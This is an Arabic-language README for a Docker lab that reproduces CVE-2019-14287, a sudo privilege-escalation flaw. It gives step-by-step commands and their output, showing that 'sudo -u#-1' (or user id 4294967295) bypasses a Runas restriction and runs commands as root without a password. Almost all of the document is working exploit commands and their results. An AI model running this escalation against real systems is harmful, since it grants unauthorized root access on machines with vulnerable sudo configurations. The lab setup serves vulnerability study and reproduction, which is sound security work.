
PoC قائم على Docker يُظهر تصعيد صلاحيات sudo عبر CVE-2019-14287 عن طريق تجاوز تقييد مستخدم Runas، مع تعليمات إعادة الإنتاج خطوة بخطوة.
هذا مثال لإعادة إنتاج ثغرة sudo (CVE-2019-14287) داخل حاوية Docker.
docker compose up -ddocker exec -it vulnerable_sudo_app bashwhoami أو id لتأكيد أنك مستخدم عادي (ليس root)
$ whoami
user1
$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1)
$ id -u
1000
sudo -u#0 whoami أو sudo -u#0 id -u
-u) بقيمة 0 (root)$ sudo -u#0 whoami
[sudo] password for user1:
$ sudo -u#0 id
[sudo] password for user1:
$ sudo -u#0 id -u
[sudo] password for user1:
sudo -u#-1 whoami أو sudo -u#-1 id -u لتأكيد إمكانية تشغيل الأوامر كـ root دون مصادقة (إعادة إنتاج الثغرة)
-u#4294967295 أيضًا بنفس الطريقة$ sudo -u#-1 whoami
root
$ sudo -u#-1 id
uid=0(root) gid=1000(user1) groups=1000(user1)
$ sudo -u#-1 id -u
0